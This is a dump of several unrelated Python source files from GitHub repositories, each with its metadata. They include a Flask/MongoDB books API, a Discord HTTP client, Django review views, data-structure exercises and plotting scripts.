[\n downgrade_Edge(kedge, id_)\n for id_, kedge in kgraph[\"edges\"].items()\n ],\n }\n\n\ndef downgrade_QNode(qnode, id_):\n \"\"\"Downgrade QNode from 1.0.0 to 0.9.2.\"\"\"\n qnode = {**qnode}\n new = {\"id\": id_}\n category = qnode.pop(\"category\", None)\n if category is not None:\n if isinstance(category, list):\n if len(category) > 1:\n raise ValueError(\"QNode with multiple categories is not backwards-compatible\")\n new[\"type\"] = downgrade_BiolinkEntity(category[0])\n else:\n new[\"type\"] = downgrade_BiolinkEntity(category)\n curie = qnode.pop(\"id\", None)\n if curie is not None:\n new[\"curie\"] = curie\n new = {\n **new,\n **qnode,\n }\n return new\n\n\ndef downgrade_QEdge(qedge, id_):\n \"\"\"Downgrade QEdge from 1.0.0 to 0.9.2.\"\"\"\n qedge = {**qedge}\n new = {\n \"id\": id_,\n \"source_id\": qedge.pop(\"subject\"),\n \"target_id\": qedge.pop(\"object\"),\n }\n predicate = qedge.pop(\"predicate\", None)\n if predicate is not None:\n if isinstance(predicate, list):\n if len(predicate) > 1:\n raise ValueError(\"QEdge with multiple predicates is not backwards-compatible\")\n new[\"type\"] = downgrade_BiolinkPredicate(predicate[0])\n else:\n new[\"type\"] = downgrade_BiolinkPredicate(predicate)\n relation = qedge.pop(\"relation\", None)\n if relation is not None:\n new[\"relation\"] = relation\n new = {\n **new,\n **qedge,\n }\n return new\n\n\ndef downgrade_QueryGraph(qgraph):\n \"\"\"Downgrade QueryGraph from 1.0.0 to 0.9.2.\"\"\"\n return {\n \"nodes\": [\n downgrade_QNode(qnode, id_)\n for id_, qnode in qgraph[\"nodes\"].items()\n ],\n \"edges\": [\n downgrade_QEdge(qedge, id_)\n for id_, qedge in qgraph[\"edges\"].items()\n ],\n }\n\n\ndef downgrade_NodeBinding(node_binding, qg_id):\n \"\"\"Downgrade NodeBinding from 1.0.0 to 0.9.2.\"\"\"\n new = {\n \"qg_id\": qg_id,\n \"kg_id\": node_binding[\"id\"],\n }\n for key, value in node_binding.items():\n if key == \"id\":\n continue\n new[key] = value\n return new\n\n\ndef downgrade_EdgeBinding(edge_binding, qg_id):\n \"\"\"Downgrade EdgeBinding from 1.0.0 to 0.9.2.\"\"\"\n new = {\n \"qg_id\": qg_id,\n \"kg_id\": edge_binding[\"id\"],\n }\n for key, value in edge_binding.items():\n if key == \"id\":\n continue\n new[key] = value\n return new\n\n\ndef downgrade_Result(result):\n \"\"\"Downgrade Result from 1.0.0 to 0.9.2.\"\"\"\n result = {**result}\n new = {\n \"node_bindings\": [],\n \"edge_bindings\": [],\n }\n for qg_id, nbs in result.pop(\"node_bindings\").items():\n new[\"node_bindings\"].extend(\n downgrade_NodeBinding(nb, qg_id)\n for nb in nbs\n )\n for qg_id, ebs in result.pop(\"edge_bindings\").items():\n new[\"edge_bindings\"].extend(\n downgrade_EdgeBinding(eb, qg_id)\n for eb in ebs\n )\n new = {\n **new,\n **result,\n }\n return new\n\n\ndef downgrade_Message(message):\n \"\"\"Downgrade Message from 1.0.0 to 0.9.2.\"\"\"\n new = dict()\n if message.get(\"query_graph\", None) is not None:\n new[\"query_graph\"] = downgrade_QueryGraph(message[\"query_graph\"])\n if message.get(\"knowledge_graph\", None) is not None:\n new[\"knowledge_graph\"] = downgrade_KnowledgeGraph(message[\"knowledge_graph\"])\n if message.get(\"results\", None) is not None:\n new[\"results\"] = [\n downgrade_Result(result)\n for result in message[\"results\"]\n ]\n return new\n\n\ndef downgrade_Query(query):\n \"\"\"Downgrade Query from 1.0.0 to 0.9.2.\"\"\"\n query = {**query}\n return {\n \"message\": downgrade_Message(query.pop(\"message\")),\n **query,\n }\n","repo_name":"TranslatorSRI/reasoner-converter","sub_path":"reasoner_converter/downgrading.py","file_name":"downgrading.py","file_ext":"py","file_size_in_byte":5850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"6174689254","text":"class Node:\n def __init__(self, value=None, next_node=None):\n self.value = value\n self.next_node = next_node\n\n def get_value(self):\n return self.value\n\n def get_next(self):\n return self.next_node\n\n def set_next(self, new_next):\n self.next_node = new_next\n\nclass LinkedList:\n def __init__(self):\n self.head = None\n self.tail = None\n\n def add_to_tail(self, value):\n new_node = Node(value)\n if not self.head:\n self.head = new_node\n self.tail = new_node\n else:\n self.tail = new_node\n self.tail.set_next(new_node)\n\n\n def add_to_head(self, value):\n new_node = Node(value)\n if not self.head:\n self.head = new_node\n self.tail = new_node\n else:\n new_node.next_node = self.head\n self.head = new_node\n\n\n def remove_head(self):\n if self.head:\n removed_head = self.head\n self.head = self.head.get_next()\n self.tail = None\n return removed_head.value\n\n def contains(self, value):\n node_being_searched = self.head #We start by checking the head value\n while node_being_searched:\n if node_being_searched.value == value:\n return True\n node_being_searched = node_being_searched.get_next() #node to be searched updated to next node\n return False\n\n def get_max(self):\n current_node = self.head\n if not current_node:\n return None\n\n max_value = current_node.value\n\n while current_node:\n if current_node.value > max_value:\n max_value = current_node.value\n\n current_node = current_node.get_next()\n\n return max_value\n\n def display(self):\n elems = []\n cur_node = self.head\n while cur_node.get_next():\n elems.append(cur_node.value)\n cur_node = cur_node.get_next()\n elems.append(cur_node.value)\n print(elems)\n\n\nclass Queue:\n def __init__(self):\n self.size = 0\n self.storage = LinkedList()\n\n def enqueue(self, item):\n self.storage.add_to_tail(item)\n self.size += 1\n\n def dequeue(self):\n if self.size == 0:\n return None\n self.size -= 1\n return self.storage.remove_head()\n\n def len(self):\n return self.size\n\nclass Stack:\n def __init__(self):\n self.size = 0\n self.storage = LinkedList()\n\n def push(self, item):\n self.storage.add_to_head(item)\n self.size += 1\n\n def pop(self):\n self.size -= 1\n return self.storage.remove_head()\n\n def display(self):\n return self.storage.display()\n\nclass BinarySearchTree:\n def __init__(self, value):\n self.value = value\n self.left = None\n self.right = None\n\n def depth_first_for_each(self, cb):\n stack = Stack()\n stack.push(self)\n while stack.size > 0:\n current_node = stack.pop()\n if current_node.right:\n stack.push(current_node.right)\n if current_node.left:\n stack.push(current_node.left)\n cb(current_node.value)\n\n def breadth_first_for_each(self, cb):\n # queue = Queue()\n # queue.enqueue(self)\n\n queue = []\n queue.append(self)\n\n while len(queue) > 0:\n current_node = queue.pop(0)\n if current_node.left:\n queue.append(current_node.left)\n if current_node.right:\n queue.append(current_node.right)\n cb(current_node.value)\n\n def insert(self, value):\n new_tree = BinarySearchTree(value)\n if (value < self.value):\n if not self.left:\n self.left = new_tree\n else:\n self.left.insert(value)\n elif value >= self.value:\n if not self.right:\n self.right = new_tree\n else:\n self.right.insert(value)\n\n def contains(self, target):\n if self.value == target:\n return True\n if self.left:\n if self.left.contains(target):\n return True\n if self.right:\n if self.right.contains(target):\n return True\n return False\n\n def get_max(self):\n if not self:\n return None\n max_value = self.value\n current = self\n while current:\n if current.value > max_value:\n max_value = current.value\n current = current.right\n return max_value\n\nbst = BinarySearchTree(5)\n\n# bst.insert(2)\n# bst.insert(3)\n# bst.insert(7)\n# bst.insert(9)\n\narr = []\ncb = lambda x: print(x)\n\n# bst.depth_first_for_each(cb)\n\nbst.insert(3)\nbst.insert(4)\nbst.insert(10)\nbst.insert(9)\nbst.insert(11)\nbst.breadth_first_for_each(cb)\n","repo_name":"TheDeterminator/Sprint-Challenge--Data-Structures-Algorithms","sub_path":"data_structures/ex_1/binary_search_tree.py","file_name":"binary_search_tree.py","file_ext":"py","file_size_in_byte":4432,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5995462566","text":"# -*- coding: UTF-8 -*-\nimport matplotlib as mpl \nimport matplotlib.pyplot as plt \nimport pandas as pd \n\n\ndata_train = pd.read_csv('train.csv')\nfont = 'SimHei'\nmpl.rcParams['font.sans-serif'] = [font] # 指定默认字体\n\n\n#有无cabin对是否获救的影响\nfig = plt.figure(figsize = (8, 6))\nxlist = [0, 1]\n\n\nplt.title(u\"有无cabin对是否获救的影响\")\nplt.yticks([])\nplt.xticks([])\nax1 = fig.add_subplot(121)\ndata_train.Survived[pd.notnull(data_train.Cabin)].value_counts().plot(kind = 'bar')\nplt.legend([u\"有Cabin信息\"])\nplt.plot(xlist)\n\nax2 = fig.add_subplot(122, sharey = ax1)\ndata_train.Survived[pd.isnull(data_train.Cabin)].value_counts().plot(kind = 'bar')\nplt.legend([u\"无Cabin信息\"])\n\n\nplt.savefig(u\"有无cabin对是否获救的影响\")\nplt.show()","repo_name":"zero1997/Titanic","sub_path":"picture7.py","file_name":"picture7.py","file_ext":"py","file_size_in_byte":773,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74773120486","text":"# suppose we create a dictionary like this -\n\n# empty dictionary\nfound = {}\n\n# adding key values to dictionary\nfound['a'] = 0\nfound['i'] = 0\nfound['e'] = 0\nfound['u'] = 0\nfound['o'] = 0\n\n# printing it will give it in a random order\n# since in dictionaries order might not be preserved\nprint(found)\n\n# so we use sorted() to return a sorted dictionary\nprint(sorted(found))\n\n# it can also be used with loop\nfor k,v in sorted(found.items()):\n print(k,':',v)","repo_name":"jaikherajani/PythonCodes","sub_path":"head_first/c3p2_sorting_dictionaries.py","file_name":"c3p2_sorting_dictionaries.py","file_ext":"py","file_size_in_byte":456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21214460359","text":"from typing import Any, Dict, Optional, Sequence\nfrom discord.http import Route, json_or_text\nfrom discord import utils, File\nfrom discord.errors import Forbidden, NotFound, DiscordServerError\nfrom .errors import HTTPException\nfrom urllib.parse import quote as _uriquote\nimport sys\nfrom requests.models import Response\nimport requests\nimport json\nimport time\nfrom discord.http import HTTPClient as _HTTPClient\n\n\ndef json_or_text(response: requests.Response):\n text = response.text\n try:\n if response.headers[\"content-type\"] == \"application/json\":\n return json.loads(text)\n except KeyError:\n # Thanks Cloudflare\n pass\n\n return text\n\n\nclass HttpClient(_HTTPClient):\n def __init__(self, token: str, *, session: requests.Session = None):\n self.token = token\n\n self.__session = session or requests.Session()\n # implement locks latr # self._locks = weakref.WeakValueDictionary()\n\n user_agent = \"(https://github.com/Squidtoon99/command-handler {0}) Python/{1[0]}.{1[1]} requests/{2}\"\n self.user_agent: str = user_agent.format(\n \"1.0\", sys.version_info, requests.__version__\n )\n\n def request(\n self, route: Route, *, files: Optional[Sequence[File]] = [], **kwargs: Any\n ):\n method = route.method\n url = route.url\n\n headers: Dict[str, str] = {\"User-Agent\": self.user_agent}\n\n if self.token is not None:\n headers[\"Authorization\"] = f\"Bot {self.token}\"\n\n if \"json\" in kwargs:\n headers[\"Content-Type\"] = \"application/json\"\n kwargs[\"data\"] = utils._to_json(kwargs.pop(\"json\")).encode(\"utf8\")\n\n try:\n reason = kwargs.pop(\"reason\")\n except KeyError:\n pass\n else:\n headers[\"X-Audit-Log-Reason\"] = _uriquote(reason, safe=\"/ \")\n\n kwargs[\"headers\"] = headers\n\n # TODO: #1 IMPLEMENT PROXY\n # if self.proxy is not None:\n # kwargs[\"proxy\"] = self.proxy\n # if self.proxy_auth is not None:\n # kwargs[\"proxy_auth\"] = self.proxy_auth\n\n for tries in range(5):\n if files:\n for f in files:\n f.reset(seek=tries)\n\n try:\n response: Response = self.__session.request(method, url, **kwargs)\n\n data = json_or_text(response)\n remaining = response.headers.get(\"X-Ratelimit-Remaining\")\n if remaining == \"0\" and response.status_code != 429:\n pass\n # we've depleted our current bucket\n # delta = utils._parse_ratelimit_header(response, use_clock=self.use_clock)\n # # _log.debug('A rate limit bucket has been exhausted (bucket: %s, retry: %s).', bucket, delta)\n # maybe_lock.defer()\n # self.loop.call_later(delta, lock.release)\n\n # the request was successful so just return the text/json\n if 300 > response.status_code >= 200:\n return data\n\n # we are being rate limited\n if response.status_code == 429:\n if not response.headers.get(\"Via\") or isinstance(data, str):\n # Banned by Cloudflare more than likely.\n raise HTTPException(response, data)\n\n fmt = 'We are being rate limited. Retrying in %.2f seconds. Handled under the bucket \"%s\"'\n\n # sleep a bit\n retry_after: float = data[\"retry_after\"]\n # _log.warning(fmt, retry_after, bucket)\n\n # check if it's a global rate limit\n # is_global = data.get(\"global\", False)\n # if is_global:\n # _log.warning(\n # \"Global rate limit has been hit. Retrying in %.2f seconds.\",\n # retry_after,\n # )\n # self._global_over.clear()\n\n time.sleep(retry_after)\n # _log.debug(\"Done sleeping for the rate limit. Retrying...\")\n\n # release the global lock now that the\n # global rate limit has passed\n # if is_global:\n # self._global_over.set()\n # _log.debug(\"Global rate limit is now over.\")\n\n # continue\n\n # we've received a 500, 502, or 504, unconditional retry\n if response.status_code in {500, 502, 504}:\n time.sleep(0.5) # i'm not made of money here\n continue\n\n # the usual error cases\n if response.status_code == 403:\n raise Forbidden(response, data)\n elif response.status_code == 404:\n raise NotFound(response, data)\n elif response.status_code >= 500:\n raise DiscordServerError(response, data)\n else:\n raise HTTPException(response, data)\n\n # This is handling exceptions from the request\n except OSError as e:\n # Connection reset by peer\n if tries < 4 and e.errno in (54, 10054):\n time.sleep(tries * 0.5)\n continue\n raise\n\n if response is not None:\n # We've run out of retries, raise.\n if response.status_code >= 500:\n raise DiscordServerError(response, data)\n\n raise HTTPException(response, data)\n\n raise RuntimeError(\"Unreachable code in HTTP handling\")\n\n def get_from_cdn(self, url: str) -> bytes:\n r = self.__session.get(url)\n\n if r.status_code == 200:\n return r.content\n elif r.status_code == 404:\n raise NotFound(r, \"asset not found\")\n elif r.status_code == 403:\n raise Forbidden(r, \"access forbidden\")\n else:\n raise HTTPException(r, \"failed getting asset\")\n","repo_name":"Friskytool/command-handler","sub_path":"squid/http/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":6087,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"8997456786","text":"from django.shortcuts import render, redirect\nfrom .models import Review\n\n# Create your views here.\ndef index(request):\n reviews = Review.objects.all()\n rangee = range(len(reviews))\n context = {\n 'reviews': reviews,\n 'range': rangee,\n }\n return render(request, 'movie/index.html', context)\n\ndef write(request):\n return render(request, 'movie/write.html')\n \ndef write_sec(request):\n title = request.GET.get('title')\n content = request.GET.get('content')\n star = request.GET.get('star')\n Review.objects.create(title=title, content=content, star=star)\n return redirect('movie:index')\n\ndef content(request, pk):\n review = Review.objects.get(pk=pk)\n review.hits += 1\n review.save()\n context = {\n 'review': review,\n }\n return render(request, 'movie/content.html', context)\n\ndef edit(request, pk):\n review = Review.objects.get(pk=pk)\n context = {\n 'review': review,\n }\n return render(request, 'movie/edit.html', context)\n\ndef edit_sec(request, pk):\n review = Review.objects.get(pk=pk)\n title = request.GET.get('title')\n content = request.GET.get('content')\n star = request.GET.get('star')\n review.title = title\n review.content = content\n review.star = star\n review.save()\n return redirect('movie:index')\n\ndef delete(request, pk):\n Review.objects.get(pk=pk).delete()\n return redirect('movie:index')","repo_name":"psun0610/TeamProject_Movie3","sub_path":"pair/movie/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33156669698","text":"\"\"\"Buildings API schemas\"\"\"\nimport marshmallow as ma\nimport marshmallow_sqlalchemy as msa\n\nfrom bemserver_core.model import Building\n\nfrom bemserver_api import AutoSchema, Schema\nfrom bemserver_api.extensions import ma_fields\n\n\nclass BuildingSchema(AutoSchema):\n class Meta(AutoSchema.Meta):\n model = Building\n\n id = msa.auto_field(dump_only=True)\n name = msa.auto_field(validate=ma.validate.Length(1, 80))\n\n\nclass BuildingPutSchema(BuildingSchema):\n class Meta(BuildingSchema.Meta):\n exclude = (\"site_id\",)\n\n\nclass BuildingQueryArgsSchema(Schema):\n sort = ma_fields.SortField((\"name\",))\n name = ma.fields.Str()\n campaign_id = ma.fields.Int()\n site_id = ma.fields.Int()\n ifc_id = ma.fields.String()\n","repo_name":"BEMServer/bemserver-api","sub_path":"bemserver_api/resources/buildings/schemas.py","file_name":"schemas.py","file_ext":"py","file_size_in_byte":740,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"34658991656","text":"import yql\n\nfrom google.appengine.api import images\n\n\ndef do_yql(query):\n\ty = yql.Public()\n\tresult = y.execute(query)\n\treturn result\n\n\n\ndef get_image_aspect(image):\n\timg = images.Image(image)\n\twidth = img.width\n\theight = img.height\n\tif width == height:\n\t\treturn \"square\"\n\telif width > height:\n\t\treturn \"landscape\"\n\telif height > width:\n\t\treturn \"portrait\"\n\n\ndef get_size(image):\n\timg = images.Image(image)\n\twidth = img.width\n\theight = img.height\n\treturn width, height\n\n\ndef check_min_size(image, size):\n\twidth, height = get_size(image)\n\terrors = []\n\tif width < size:\n\t\terrors.append(\"The image you supplied is too thin (needs to be a minimum of \"+ str(size) +\" pixels wide)\")\n\tif height < size:\n\t\terrors.append(\"The image you supplied is not tall enough (needs to be a minimum of \"+ str(size) +\" pixels high)\")\n\treturn errors\n\n\n\ndef resize_image(image, size):\n\timg = images.Image(image)\n\twidth = img.width\n\theight = img.height\n\tif width > size and height > size:\n\t\taspect = get_image_aspect(image)\n\t\tif aspect == \"square\":\n\t\t\twidth = size\n\t\t\theight = size\n\t\telif aspect == \"landscape\":\n\t\t\tfactor = height/size\n\t\t\theight = size\n\t\t\twidth = int(width/factor)\n\t\telif aspect == \"portrait\":\n\t\t\tfactor = width/size\n\t\t\twidth = size\n\t\t\theight = int(height/factor)\n\t\timg.resize(width=width, height=height)\n\t\timage = img.execute_transforms(output_encoding=images.JPEG)\t\t\t\n\treturn image\n\n\n\ndef crop_image(image, size):\n\timage = resize_image(image, size)\n\timg = images.Image(image)\n\twidth = img.width\n\theight = img.height\n\tshape = get_image_aspect(image)\n\tif shape == \"square\":\n\t\treturn image\n\telif shape == \"portrait\":\n\t\tleft_x = 0.0\n\t\ttop_y = float((height-size)/2)/float(height)\n\t\tright_x = 1.0\n\t\tbottom_y = float(((height-size)/2) + size)/float(height)\n\telif shape == \"landscape\":\n\t\tleft_x = float((width-size)/2)/float(width)\n\t\ttop_y = 0.0\n\t\tright_x = float(((width-size)/2) + size)/float(width)\n\t\tbottom_y = 1.0\n\timg.crop(left_x, top_y, right_x, bottom_y)\n\tcropimage = img.execute_transforms(output_encoding=images.JPEG)\t\n\treturn cropimage\n\n","repo_name":"christhorpe/bonnier-scraper","sub_path":"helpers.py","file_name":"helpers.py","file_ext":"py","file_size_in_byte":2034,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"40387946414","text":"from PyQt5.QtWidgets import QFileDialog, QDialog\n\n\nclass FileDialog(QDialog):\n def __init__(self, tt, Ctrl):\n QDialog.__init__(self)\n self.ctrl = Ctrl\n\n if tt == \"Simple\":\n self.comm = self.openFileNameDialog()\n elif tt == \"Sequence\":\n self.comm = self.openFileNamesDialog()\n elif tt == \"Save\":\n self.comm = self.saveFileDialog()\n else:\n raise NotImplementedError()\n\n def getComm(self):\n return self.comm\n\n # Individual File.\n def openFileNameDialog(self):\n options = QFileDialog.Options()\n options |= QFileDialog.DontUseNativeDialog\n fileName, _ = QFileDialog.getOpenFileName(self, \"Load an individual file.\", \"\",\n \"FITS Files (*.fits)\", options=options)\n if fileName:\n comm = \"LOAD \" + fileName\n return comm\n else:\n return None\n\n # Multiple Files.\n def openFileNamesDialog(self):\n\n dir = QFileDialog.getExistingDirectory(self, \"Select a multiple files\")\n if dir:\n comm = \"LOAD \" + dir\n return comm\n else:\n return None\n\n # Save File.\n def saveFileDialog(self):\n options = QFileDialog.Options()\n options |= QFileDialog.DontUseNativeDialog\n fileName, _ = QFileDialog.getSaveFileName(self, \"Save the current file.\", \"\",\n \"Image File (*.png)\", options=options)\n if fileName:\n comm = \"SAVE \" + fileName\n return comm\n else:\n return None\n\n","repo_name":"gabgarar/SunMap","sub_path":"CrossEditorProject/View/QtViews/UtilsPanels/LoadSavePanel.py","file_name":"LoadSavePanel.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"41491626561","text":"#!/usr/bin/env python3.7\n\nimport os\nimport re\nfrom reader import get_traces\nfrom gensim.models import Word2Vec\nimport numpy as np\n\n\ndef train(filename, epochs=15):\n traces = get_traces(\"logs/\" + filename)\n model = Word2Vec(traces, min_count=1, workers=12)\n print(\"training\", filename)\n # deveria iterar o modelo? não sei, não são novas sentenças\n\n model.save(\"models/\" + re.sub(r\"\\.csv\", \"\", filename) + \".model\")\n\n\ndef train_batch():\n for filenames in os.listdir(\"logs\"):\n if re.search(r\"\\.csv\", filenames):\n train(filenames)\n\n\ndef create_vectors(filename, vectors):\n model = Word2Vec.load(filename)\n\n trace_vectors = []\n for trace in vectors:\n v = np.array(model.wv[trace[0]])\n\n for word in trace[1:]:\n v = list(map(sum, zip(v, model.wv[word])))\n vec = np.array(v)\n vec = vec / len(trace)\n trace_vectors.append(v)\n return trace_vectors\n","repo_name":"n0mori/tcc","sub_path":"encode.py","file_name":"encode.py","file_ext":"py","file_size_in_byte":936,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"8785764592","text":"\nfrom flask import Flask, request, jsonify, make_response\nfrom pymongo import MongoClient\nfrom bson import ObjectId\nimport datetime\nimport bcrypt\nfrom flask_cors import CORS\n\napp = Flask(__name__)\nCORS(app)\n\n\nclient = MongoClient(\"mongodb://127.0.0.1:27017\")\ndatabase = client.books # Using the \"books\" database\nbooks = database.best_books # Using the \"best_books\" collection\n\n\n\n#################################################\n# GET requests\n#################################################\n\n# Get all book records\n@app.route(\"/api/v1.0/books\", methods=[\"GET\"])\ndef get_all_book_records():\n page_number, page_size = 1, 15\n if request.args.get('pn'):\n page_number = int(request.args.get('pn'))\n if request.args.get('ps'):\n page_size = int(request.args.get('ps'))\n page_start = (page_size * (page_number - 1))\n \n book_data = []\n for book in books.find() \\\n .skip(page_start).limit(page_size):\n book['_id'] = str(book['_id'])\n for reader_review in book['reader_reviews']:\n reader_review['_id'] = str(reader_review['_id'])\n book_data.append(book)\n return make_response( jsonify(book_data), 200 )\n\n\n # Retrieve a specific book record\n@app.route(\"/api/v1.0/books/\", \\\n methods=[\"GET\"])\ndef show_one_book_record(bookId):\n book = books.find_one({'_id':ObjectId(bookId)})\n if book is not None:\n book['_id'] = str(book['_id'])\n for reader_review in book['reader_reviews']:\n reader_review['_id'] = str(reader_review['_id'])\n return make_response( jsonify( book ), 200 )\n else:\n return make_response( jsonify( \\\n {\"error\" : \"Book ID is invalid, please enter a valid ID\"} ), 404 )\n\n\n\n#Get the title of the book after specifying the ID\n@app.route(\"/api/v1.0/books//title\", \\\n methods=[\"GET\"])\ndef get_book_title(bookId):\n book = books.find_one({'_id':ObjectId(bookId)}, {'title': 1 , '_id': 0})\n if book is not None:\n return make_response( jsonify( book ), 200 )\n else:\n return make_response( jsonify( \\\n {\"error\" : \"Book ID is invalid, please enter a valid ID\"} ), 404 )\n\n\n\n\n#Get the book's author after specifying the ID\n@app.route(\"/api/v1.0/books//author\", \\\n methods=[\"GET\"])\ndef get_author_of_book(bookId):\n book = books.find_one({'_id':ObjectId(bookId)}, {'author': 1 , '_id': 0})\n if book is not None:\n return make_response( jsonify( book ), 200 )\n else:\n return make_response( jsonify( \\\n {\"error\" : \"Book ID is invalid, please enter a valid ID\"} ), 404 )\n\n\n\n#Get the year that the book was published\n@app.route(\"/api/v1.0/books//year\", \\\n methods=[\"GET\"])\ndef get_published_year(bookId):\n book = books.find_one({'_id':ObjectId(bookId)}, {'year': 1 , '_id': 0})\n if book is not None:\n return make_response( jsonify( book ), 200 )\n else:\n return make_response( jsonify( \\\n {\"error\" : \"Book ID is invalid, please enter a valid ID\"} ), 404 )\n\n\n\n\n\n# Get all review(s) of a book record\n@app.route(\"/api/v1.0/books//reader_reviews\", \\\n methods=[\"GET\"])\ndef retrieve_reviews(bookId):\n list_of_reviews = []\n book = books.find_one( { \"_id\" : ObjectId(bookId) }, \\\n { \"reader_reviews\" : 1, \"_id\" : 0 } )\n for bookreview in book[\"reader_reviews\"]:\n bookreview[\"_id\"] = str(bookreview[\"_id\"])\n list_of_reviews.append(bookreview)\n return make_response( jsonify( list_of_reviews ), 200 )\n\n\n\n\n# Get a specific book review by specifying the ID\n@app.route(\"/api/v1.0/books//reader_reviews/\", \\\n methods=[\"GET\"])\ndef retrive_one_review(bookId, revId):\n book = books.find_one( { \"reader_reviews._id\" : ObjectId(revId) }, \\\n { \"_id\" : 0, \"reader_reviews.$\" : 1 } )\n if book is None:\n return make_response( \\\n jsonify(\n {\"error\":\"The book review ID is invalid, please enter a valid ID\"}), 404)\n book['reader_reviews'][0]['_id'] = \\\n str(book['reader_reviews'][0]['_id'])\n\n return make_response( jsonify( book['reader_reviews'][0]), 200)\n \n\n\n\n\n#################################################\n# POST requests\n#################################################\n\n# # Add a new book record to the collection\n@app.route(\"/api/v1.0/books\", methods=[\"POST\"])\ndef add_new_book():\n if \"author\" in request.form and \\\n \"title\" in request.form and \\\n \"country\" in request.form and \\\n \"language\" in request.form and \\\n \"cover_image\" in request.form and \\\n \"pages\" in request.form and \\\n \"year\" in request.form:\n new_book = {\n \"author\" : request.form[\"author\"],\n \"title\" : request.form[\"title\"],\n \"country\" : request.form[\"country\"],\n \"language\" : request.form[\"language\"],\n \"cover_image\" : request.form[\"cover_image\"],\n \"pages\" : request.form[\"pages\"],\n \"year\" : request.form[\"year\"],\n \"reader_reviews\" : []\n }\n new_book_id = books.insert_one( \\\n new_book)\n new_book_link = \"http://localhost:5000/api/v1.0/books/\" \\\n + str(new_book_id.inserted_id)\n return make_response( jsonify(\n {\"url\": new_book_link} ), 201)\n else:\n return make_response( jsonify(\n {\"error\":\"Data is missing. Please try again\"} ), 404)\n\n\n\n\n# Add a new review to a book\n@app.route(\"/api/v1.0/books//reader_reviews\", \\\n methods=[\"POST\"])\ndef add_new_book_review(bookId):\n new_review = {\n \"_id\" : ObjectId(),\n \"name\" : request.form[\"name\"],\n \"comments\" : request.form[\"comments\"],\n \"book_rating\" : request.form[\"book_rating\"]\n }\n books.update_one( { \"_id\" : ObjectId(bookId) }, \\\n { \"$push\": { \"reader_reviews\" : new_review } } )\n new_review_url = \"http://localhost:5000/api/v1.0/books/\" \\\n + bookId + \"/reader_reviews/\" + str(new_review['_id'])\n return make_response( jsonify( \\\n { \"url\" : new_review_url } ), 201 )\n\n\n\n\n\n\n#################################################\n# PUT requests\n#################################################\n\n# Edit the details of a book\n@app.route(\"/api/v1.0/books/\", \\\n methods=[\"PUT\"]) \ndef edit_book_details(bookId):\n if \"author\" in request.form and \\\n \"title\" in request.form and \\\n \"country\" in request.form and \\\n \"language\" in request.form and \\\n \"cover_image\" in request.form and \\\n \"pages\" in request.form and \\\n \"year\" in request.form:\n result = books.update_one( \\\n { \"_id\" : ObjectId(bookId) }, {\n \"$set\" : { \"author\" : request.form[\"author\"],\n \"title\" : request.form[\"title\"],\n \"country\" : request.form[\"country\"],\n \"language\" : request.form[\"language\"],\n \"cover_image\" : request.form[\"cover_image\"],\n \"pages\" : request.form[\"pages\"],\n \"year\" : request.form[\"year\"]\n\n }\n } )\n if result.matched_count == 1:\n updated_book_details = \\\n \"http://localhost:5000/api/v1.0/books/\" + bookId\n return make_response( jsonify(\n { \"url\":updated_book_details } ), 200)\n else:\n return make_response( jsonify(\n { \"error\":\"Enter a valid book ID\" } ), 404)\n else:\n return make_response( jsonify(\n { \"error\" : \"Data is missing. Please try again\" } ), 404)\n\n\n\n\n# Edit a book review\n@app.route(\"/api/v1.0/books//reader_reviews/\", \\\n methods=[\"PUT\"])\ndef alter_book_review(bookId, revId):\n altered_review = {\n \"reader_reviews.$.name\" : request.form[\"name\"],\n \"reader_reviews.$.comments\" : request.form[\"comments\"],\n \"reader_reviews.$.book_rating\" : request.form['book_rating']\n }\n books.update_one( \\\n { \"reader_reviews._id\" : ObjectId(revId) }, \\\n { \"$set\" : altered_review } )\n altered_review_url = \"http://localhost:5000/api/v1.0/books/\" + \\\n bookId + \"/reader_reviews/\" + revId\n return make_response( jsonify( \\\n {\"url\":altered_review_url} ), 200)\n\n\n\n\n#################################################\n# DELETE requests\n#################################################\n\n# Delete a book record from the collection\n@app.route(\"/api/v1.0/books/\", \\\n methods=[\"DELETE\"])\ndef delete_book(bookId):\n result = books.delete_one( \\\n { \"_id\" : ObjectId(bookId) } )\n if result.deleted_count == 1:\n return make_response( jsonify( {} ), 204)\n else:\n return make_response( jsonify( \\\n { \"error\" : \"This book record has already been deleted\" } ), 404)\n\n\n\n# Delete a review for a book\n@app.route(\"/api/v1.0/books//reader_reviews/\", \\\n methods=[\"DELETE\"])\ndef remove_book_review(bookId, revId):\n books.update_one( \\\n { \"_id\" : ObjectId(bookId) }, \\\n { \"$pull\" : { \"reader_reviews\" : \\\n { \"_id\" : ObjectId(revId) } } } )\n return make_response( jsonify( {} ), 204)\n\n\n\nif __name__ == \"__main__\":\n app.run(debug=True)","repo_name":"NiallCurley1996/Back-end-Python-code","sub_path":"books.py","file_name":"books.py","file_ext":"py","file_size_in_byte":9402,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1717703577","text":"name = '박규민'\nnum = '202211415'\nage = '21'\n자기소개1 = '안녕하세요. 저는 프로그래밍을 좋아하는'\n\nlist = [name, num, age, 자기소개1]\n\n자기소개2 = '저의 취미는 사진 촬영과 영화 시청입니다.'\nlist.append(자기소개2)\n\n\nprint(('이름 : ' + name), ('나이 : ' + age ), ('자기소개 : ' + list[3] + ' ' + list[1] + 